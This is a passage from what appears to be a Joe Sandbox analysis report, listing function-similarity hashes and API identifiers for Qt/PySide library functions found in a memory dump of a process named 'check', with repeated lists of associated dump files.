                                                                                                                                                                                                                • API String ID: 64521866-462915029
                                                                                                                                                                                                                • Opcode ID: e410f8abd33b05d209969c46bc55700622f8c6b1af2c952791db382e58356e6a
                                                                                                                                                                                                                • Instruction ID: 06b9f897311b95e37a09d43ac75d750667485dec586e7c11cd3ab6ff79fa2c66
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e410f8abd33b05d209969c46bc55700622f8c6b1af2c952791db382e58356e6a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24012CB5A08B46C1EB10CF71E8886A833B8FB41B44F9140B6CA5C43320DF7DD94AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?cacheCache@@FromLimit@LongLong_Pixmap
                                                                                                                                                                                                                • String ID: QPixmapCache$cacheLimit$cacheLimit() -> int
                                                                                                                                                                                                                • API String ID: 983417776-2926451805
                                                                                                                                                                                                                • Opcode ID: 4dd0b305608f62b61bb1aaef81ed363a77abfd05ee7624c5d54747995661f2c3
                                                                                                                                                                                                                • Instruction ID: 459acb8c3b4f7d9dcbdad4eb0df1707d54fb61c1d8ee3479b9e119857b5adcd9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4dd0b305608f62b61bb1aaef81ed363a77abfd05ee7624c5d54747995661f2c3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF01DA5B08A47C2EB649B71E8483A83368FB96709FA040B2C50D52320CE3CD54AD300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: List_$Size$ItemLongLong_
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1144519416-0
                                                                                                                                                                                                                • Opcode ID: 87c7589c3d866cc5d2d0eb5da0fb8451543ff253408e77ed3a235263022f7c2c
                                                                                                                                                                                                                • Instruction ID: 429cc2b1afa43d76b9c4f684db1a3d8aeab51e767667288cbfd997a2d691c0f9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87c7589c3d866cc5d2d0eb5da0fb8451543ff253408e77ed3a235263022f7c2c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E01E1A1B0D64182EFA08B35F9511357358EB45BE0F440274DA2F53BD0DEBCE0428700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?remove@?$Point@@@@Vector@
                                                                                                                                                                                                                • String ID: QPolygon$__delitem__
                                                                                                                                                                                                                • API String ID: 587356521-665072597
                                                                                                                                                                                                                • Opcode ID: 2a994bc7ece17de9686e903335fe4b35282a154f4388184507d86c54d20766b6
                                                                                                                                                                                                                • Instruction ID: 74b3f97e82355859c38bd53e235823900e8c0543db26a3c96c44bcf1b1d4d20b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a994bc7ece17de9686e903335fe4b35282a154f4388184507d86c54d20766b6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4941EB76B0CB8682EB509F29E44416AB7A5FB89B94F548172EF4D53B68DF3CD085CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromItem@@LongStandardV0@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 709210250-2407233842
                                                                                                                                                                                                                • Opcode ID: c3cf89d32234f65ad9cb8b1ac91d7a74de0947322eaa4eac3e4b6056b424d204
                                                                                                                                                                                                                • Instruction ID: b73c792b2b39ffc1308ec9bbabf328b092def2b7c53a448e2891c8906d7edc0c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3cf89d32234f65ad9cb8b1ac91d7a74de0947322eaa4eac3e4b6056b424d204
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C211675A08A9282EA608F65F44426AB368FB9ABD8F1440B6DE8D13B68DF7CD1458700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLongPalette@@V0@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 2256276294-2407233842
                                                                                                                                                                                                                • Opcode ID: 91527a5669e0e785ec8e892bf14fdca3b2671f552bc7a3f8aa753c9c092ce01b
                                                                                                                                                                                                                • Instruction ID: 740b156368d7bfefa6c530ab43a00b93561aff4683c2611d9f5f054a41f5ffc8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91527a5669e0e785ec8e892bf14fdca3b2671f552bc7a3f8aa753c9c092ce01b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11215E75A0CB5282EB608B25F40416AB378FB85B98F5484B6DE8D13B68CF7CD185C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_CopyCursor@@FromLongTextV1@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 1629049401-2407233842
                                                                                                                                                                                                                • Opcode ID: d24751f4805590d8858050c391a3e6c61e34f4a8c69c97d6852fb7fad733c72e
                                                                                                                                                                                                                • Instruction ID: bb1f17d16289f69ed71635655c0e6e4a04d8a8d4961e2f4c07879819104ebb0b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d24751f4805590d8858050c391a3e6c61e34f4a8c69c97d6852fb7fad733c72e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10215EB5A08B9281EB619B65F40426AB378FB89BD8F5440B2DF8D13B68CF3CD0858700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ??8@Bool_FromLayout@@0@LongPage
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 3886444301-2407233842
                                                                                                                                                                                                                • Opcode ID: 99ba104142243b47424562172ba40db84b83dfaa01b5d23d47fe70452c8eac9e
                                                                                                                                                                                                                • Instruction ID: ecd34fdb738963609ce15f1d1c51c7c52f642ae77b3ecce1d372305d461c6858
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99ba104142243b47424562172ba40db84b83dfaa01b5d23d47fe70452c8eac9e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02215E76A0CB52C1EB608B65F44416AB368FB85B98F144172EE8D13B68CF7CD045C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLongOption@@Tab@TextU01@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 4107022758-2407233842
                                                                                                                                                                                                                • Opcode ID: 3e8f1b1ef7a1ababe6240be13039e9ccd9b33afcc53d986435980aecf71ee6cb
                                                                                                                                                                                                                • Instruction ID: 2c61fae96caec409be8e441cefcebd2c041f67ab17696ba32c8061f7a1a250a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e8f1b1ef7a1ababe6240be13039e9ccd9b33afcc53d986435980aecf71ee6cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53213E75A0CB9282FB608B65F44416AB768FB85B98F1881B6DE8D13B68CF7CD045C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
